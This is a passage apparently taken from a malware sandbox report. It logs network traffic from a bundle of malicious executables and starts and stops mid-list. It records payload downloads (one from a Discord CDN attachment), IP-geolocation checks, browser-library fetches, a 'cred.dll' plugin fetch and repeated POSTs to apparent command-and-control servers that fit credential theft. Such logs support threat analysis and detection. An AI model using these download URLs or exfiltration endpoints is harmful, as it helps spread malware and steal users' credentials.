                                                                                                                                                                                        https://cdn.discordapp.com/attachments/849802777433341954/851833670733266955/jooyu.exe
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        1.1kB
                                                                                                                                                                                        4.7kB
                                                                                                                                                                                        12
                                                                                                                                                                                        10

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://cdn.discordapp.com/attachments/849802777433341954/851833670733266955/jooyu.exe

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 74.114.154.22:443
                                                                                                                                                                                        https://sergeevih43.tumblr.com/
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        VpYfqWTsvrvmk4DESisFXHov.exe
                                                                                                                                                                                        1.4kB
                                                                                                                                                                                        20.7kB
                                                                                                                                                                                        24
                                                                                                                                                                                        21

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://sergeevih43.tumblr.com/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 159.65.63.164:80
                                                                                                                                                                                        http://g-partners.top/dlc/distribution.php?pub=mixinte
                                                                                                                                                                                        http
                                                                                                                                                                                        2aNJWnHICffmGqno89GuHbVV.exe
                                                                                                                                                                                        22.9kB
                                                                                                                                                                                        568.3kB
                                                                                                                                                                                        489
                                                                                                                                                                                        488

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://g-partners.top/dlc/distribution.php?pub=mixinte

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 74.114.154.22:443
                                                                                                                                                                                        https://sergeevih43.tumblr.com/
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        vt_ASiQuT3fR9eoJIz5PVk6E.exe
                                                                                                                                                                                        1.0kB
                                                                                                                                                                                        5.9kB
                                                                                                                                                                                        15
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://sergeevih43.tumblr.com/
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 157.90.127.76:80
                                                                                                                                                                                        http://157.90.127.76/
                                                                                                                                                                                        http
                                                                                                                                                                                        VpYfqWTsvrvmk4DESisFXHov.exe
                                                                                                                                                                                        145.4kB
                                                                                                                                                                                        2.5MB
                                                                                                                                                                                        2011
                                                                                                                                                                                        1998

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://157.90.127.76/932

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://157.90.127.76/freebl3.dll

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://157.90.127.76/mozglue.dll

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://157.90.127.76/msvcp140.dll

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://157.90.127.76/nss3.dll

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://157.90.127.76/softokn3.dll

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://157.90.127.76/vcruntime140.dll

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://157.90.127.76/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 23.21.224.49:443
                                                                                                                                                                                        https://api.ipify.org/
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        rwI3a3wTWh88dBrQa1ud4qdg.exe
                                                                                                                                                                                        1.0kB
                                                                                                                                                                                        6.9kB
                                                                                                                                                                                        14
                                                                                                                                                                                        16

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://api.ipify.org/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 185.215.113.81:28578
                                                                                                                                                                                        http://185.215.113.81:28578/
                                                                                                                                                                                        http
                                                                                                                                                                                        1um0tg3NcHdOWZT14jfQXEXD.exe
                                                                                                                                                                                        3.8MB
                                                                                                                                                                                        59.3kB
                                                                                                                                                                                        2575
                                                                                                                                                                                        1343

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.81:28578/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.81:28578/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.81:28578/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 5.44.45.141:80
                                                                                                                                                                                        http://enatuykebe.xyz/
                                                                                                                                                                                        http
                                                                                                                                                                                        dbQ3iIm0h1LDkWoDgn5v_vH9.exe
                                                                                                                                                                                        2.2MB
                                                                                                                                                                                        36.8kB
                                                                                                                                                                                        1588
                                                                                                                                                                                        888

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://enatuykebe.xyz/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://enatuykebe.xyz/
                                                                                                                                                                                      • 104.16.169.131:443
                                                                                                                                                                                        hcaptcha.com
                                                                                                                                                                                        tls
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        1.7kB
                                                                                                                                                                                        3.8kB
                                                                                                                                                                                        13
                                                                                                                                                                                        13
                                                                                                                                                                                      • 45.139.184.124:80
                                                                                                                                                                                        http://tstamore.info/
                                                                                                                                                                                        http
                                                                                                                                                                                        1326211188.exe
                                                                                                                                                                                        605.6kB
                                                                                                                                                                                        17.2kB
                                                                                                                                                                                        417
                                                                                                                                                                                        268

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://tstamore.info/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://tstamore.info/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://tstamore.info/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 208.95.112.1:80
                                                                                                                                                                                        http://ip-api.com/json/
                                                                                                                                                                                        http
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        958 B
                                                                                                                                                                                        845 B
                                                                                                                                                                                        10
                                                                                                                                                                                        9

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://ip-api.com/json/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 104.26.13.31:443
                                                                                                                                                                                        https://api.ip.sb/geoip
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        dbQ3iIm0h1LDkWoDgn5v_vH9.exe
                                                                                                                                                                                        937 B
                                                                                                                                                                                        16.7kB
                                                                                                                                                                                        13
                                                                                                                                                                                        21

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://api.ip.sb/geoip

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 101.36.107.74:80
                                                                                                                                                                                        http://101.36.107.74/seemorebty/il.php?e=md8_8eus
                                                                                                                                                                                        http
                                                                                                                                                                                        md8_8eus.exe
                                                                                                                                                                                        690 B
                                                                                                                                                                                        447 B
                                                                                                                                                                                        6
                                                                                                                                                                                        4

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://101.36.107.74/seemorebty/il.php?e=md8_8eus

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 104.26.13.31:443
                                                                                                                                                                                        https://api.ip.sb/geoip
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        1326211188.exe
                                                                                                                                                                                        891 B
                                                                                                                                                                                        16.8kB
                                                                                                                                                                                        12
                                                                                                                                                                                        20

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://api.ip.sb/geoip

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.3kB
                                                                                                                                                                                        13.9kB
                                                                                                                                                                                        15
                                                                                                                                                                                        14

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.26.13.31:443
                                                                                                                                                                                        https://api.ip.sb/geoip
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        1um0tg3NcHdOWZT14jfQXEXD.exe
                                                                                                                                                                                        891 B
                                                                                                                                                                                        16.7kB
                                                                                                                                                                                        12
                                                                                                                                                                                        19

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://api.ip.sb/geoip

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 74.114.154.22:443
                                                                                                                                                                                        https://sergeevih43.tumblr.com/
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        BN2v6gd1v89066wDB6eRa3Rp.exe
                                                                                                                                                                                        1.5kB
                                                                                                                                                                                        20.9kB
                                                                                                                                                                                        26
                                                                                                                                                                                        25

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://sergeevih43.tumblr.com/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 88.99.66.31:443
                                                                                                                                                                                        https://iplogger.org/ZhiS4
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        md8_8eus.exe
                                                                                                                                                                                        1.1kB
                                                                                                                                                                                        7.2kB
                                                                                                                                                                                        9
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://iplogger.org/ZhiS4

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 34.117.59.81:443
                                                                                                                                                                                        https://ipinfo.io/ip
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        dbQ3iIm0h1LDkWoDgn5v_vH9.exe
                                                                                                                                                                                        1.0kB
                                                                                                                                                                                        5.9kB
                                                                                                                                                                                        15
                                                                                                                                                                                        18

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://ipinfo.io/ip

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 34.117.59.81:443
                                                                                                                                                                                        https://ipinfo.io/ip
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        1326211188.exe
                                                                                                                                                                                        750 B
                                                                                                                                                                                        5.6kB
                                                                                                                                                                                        9
                                                                                                                                                                                        11

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://ipinfo.io/ip

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 34.117.59.81:443
                                                                                                                                                                                        https://ipinfo.io/ip
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        1um0tg3NcHdOWZT14jfQXEXD.exe
                                                                                                                                                                                        842 B
                                                                                                                                                                                        5.7kB
                                                                                                                                                                                        11
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://ipinfo.io/ip

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 185.183.98.8:80
                                                                                                                                                                                        http://rdanoriran.xyz/
                                                                                                                                                                                        http
                                                                                                                                                                                        rwI3a3wTWh88dBrQa1ud4qdg.exe
                                                                                                                                                                                        3.8MB
                                                                                                                                                                                        56.3kB
                                                                                                                                                                                        2573
                                                                                                                                                                                        1385

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://rdanoriran.xyz/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://rdanoriran.xyz/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 157.90.127.76:80
                                                                                                                                                                                        http://157.90.127.76/
                                                                                                                                                                                        http
                                                                                                                                                                                        BN2v6gd1v89066wDB6eRa3Rp.exe
                                                                                                                                                                                        126.9kB
                                                                                                                                                                                        1.3MB
                                                                                                                                                                                        1048
                                                                                                                                                                                        1031

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://157.90.127.76/903

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://157.90.127.76/nss3.dll

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://157.90.127.76/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 157.240.240.35:443
                                                                                                                                                                                        https://www.facebook.com/
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        10.4kB
                                                                                                                                                                                        449.8kB
                                                                                                                                                                                        191
                                                                                                                                                                                        348

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://www.facebook.com/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://www.facebook.com/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 52.84.150.16:443
                                                                                                                                                                                        www.binance.com
                                                                                                                                                                                        tls, http2
                                                                                                                                                                                        MicrosoftEdgeCP.exe
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        4.7kB
                                                                                                                                                                                        18
                                                                                                                                                                                        17
                                                                                                                                                                                      • 52.84.150.16:443
                                                                                                                                                                                        https://www.binance.com/en/register?ref=WDA8929C
                                                                                                                                                                                        tls, http2
                                                                                                                                                                                        MicrosoftEdgeCP.exe
                                                                                                                                                                                        1.5kB
                                                                                                                                                                                        5.9kB
                                                                                                                                                                                        19
                                                                                                                                                                                        18

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://www.binance.com/en/register?ref=WDA8929C

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 34.104.35.123:80
                                                                                                                                                                                        http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUwyMERESEZGVmJnQQ/1.0.0.6_nmmhkkegccagdldgiimedpiccmgmieda.crx
                                                                                                                                                                                        http
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        5.6kB
                                                                                                                                                                                        257.8kB
                                                                                                                                                                                        114
                                                                                                                                                                                        218

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUwyMERESEZGVmJnQQ/1.0.0.6_nmmhkkegccagdldgiimedpiccmgmieda.crx

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 79.174.12.174:80
                                                                                                                                                                                        http://79.174.12.174/base/api/getData.php
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        1.6kB
                                                                                                                                                                                        1.0kB
                                                                                                                                                                                        9
                                                                                                                                                                                        7

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://79.174.12.174/base/api/getData.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://79.174.12.174/base/api/getData.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        644 B
                                                                                                                                                                                        252 B
                                                                                                                                                                                        6
                                                                                                                                                                                        6

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 220.125.1.129:80
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        http
                                                                                                                                                                                        769 B
                                                                                                                                                                                        793 B
                                                                                                                                                                                        5
                                                                                                                                                                                        5

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://lahuertasonora.com/upload/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        404
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 88.99.66.31:443
                                                                                                                                                                                        https://iplis.ru/1G8Fx7.mp3
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        1.1kB
                                                                                                                                                                                        5.6kB
                                                                                                                                                                                        8
                                                                                                                                                                                        11

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://iplis.ru/1S3fd7.mp3

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://iplis.ru/1G8Fx7.mp3

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 220.125.1.129:80
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        http
                                                                                                                                                                                        863 B
                                                                                                                                                                                        793 B
                                                                                                                                                                                        5
                                                                                                                                                                                        5

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://lahuertasonora.com/upload/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        404
                                                                                                                                                                                      • 216.58.208.99:443
                                                                                                                                                                                        update.googleapis.com
                                                                                                                                                                                        tls
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        8.0kB
                                                                                                                                                                                        11.3kB
                                                                                                                                                                                        27
                                                                                                                                                                                        33
                                                                                                                                                                                      • 52.84.150.16:443
                                                                                                                                                                                        https://www.binance.com/favicon.ico
                                                                                                                                                                                        tls, http2
                                                                                                                                                                                        MicrosoftEdge.exe
                                                                                                                                                                                        1.5kB
                                                                                                                                                                                        7.2kB
                                                                                                                                                                                        21
                                                                                                                                                                                        20

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://www.binance.com/favicon.ico

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        404
                                                                                                                                                                                      • 52.84.150.16:443
                                                                                                                                                                                        www.binance.com
                                                                                                                                                                                        tls, http2
                                                                                                                                                                                        MicrosoftEdge.exe
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        4.7kB
                                                                                                                                                                                        17
                                                                                                                                                                                        16
                                                                                                                                                                                      • 8.8.4.4:443
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        tls
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        747 B
                                                                                                                                                                                        2.7kB
                                                                                                                                                                                        5
                                                                                                                                                                                        5
                                                                                                                                                                                      • 8.8.4.4:443
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        tls
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        2.3kB
                                                                                                                                                                                        7.4kB
                                                                                                                                                                                        17
                                                                                                                                                                                        19
                                                                                                                                                                                      • 142.250.179.138:443
                                                                                                                                                                                        safebrowsing.googleapis.com
                                                                                                                                                                                        tls
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        130.1kB
                                                                                                                                                                                        7.3MB
                                                                                                                                                                                        2800
                                                                                                                                                                                        5498
                                                                                                                                                                                      • 88.218.92.148:80
                                                                                                                                                                                        http://uyg5wye.2ihsfa.com/api/?sid=291397&key=a03dc225caaa0cfbcbcb07b734813bd3
                                                                                                                                                                                        http
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        1.3kB
                                                                                                                                                                                        961 B
                                                                                                                                                                                        11
                                                                                                                                                                                        11

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://uyg5wye.2ihsfa.com/api/fbtime

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://uyg5wye.2ihsfa.com/api/?sid=291397&key=a03dc225caaa0cfbcbcb07b734813bd3

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 185.215.113.55:80
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        http
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        6.0kB
                                                                                                                                                                                        133.8kB
                                                                                                                                                                                        124
                                                                                                                                                                                        124

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://185.215.113.55/t5BnOoke2/plugins/cred.dll

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                      • 8.8.4.4:443
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        tls
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        701 B
                                                                                                                                                                                        132 B
                                                                                                                                                                                        4
                                                                                                                                                                                        3
                                                                                                                                                                                      • 34.104.35.123:80
                                                                                                                                                                                        http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                                        http
                                                                                                                                                                                        137.4kB
                                                                                                                                                                                        7.0MB
                                                                                                                                                                                        2796
                                                                                                                                                                                        5479

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        HEAD http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/APXXLABkvVhhXtYF5CAJK8E_43/G7yvLIv4RYlDG8Af2QDjoQ

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/APXXLABkvVhhXtYF5CAJK8E_43/G7yvLIv4RYlDG8Af2QDjoQ

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/APXXLABkvVhhXtYF5CAJK8E_43/G7yvLIv4RYlDG8Af2QDjoQ

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/APXXLABkvVhhXtYF5CAJK8E_43/G7yvLIv4RYlDG8Af2QDjoQ

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/APXXLABkvVhhXtYF5CAJK8E_43/G7yvLIv4RYlDG8Af2QDjoQ

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/APXXLABkvVhhXtYF5CAJK8E_43/G7yvLIv4RYlDG8Af2QDjoQ

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        HEAD http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/AIQWwBRSWwfx2JCxD0aw30k_2657/I-4-aBwqaCFG5rMUT0QDpg

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/AIQWwBRSWwfx2JCxD0aw30k_2657/I-4-aBwqaCFG5rMUT0QDpg

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/AIQWwBRSWwfx2JCxD0aw30k_2657/I-4-aBwqaCFG5rMUT0QDpg

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        HEAD http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206

                                                                                                                                                                                        HTTP Request

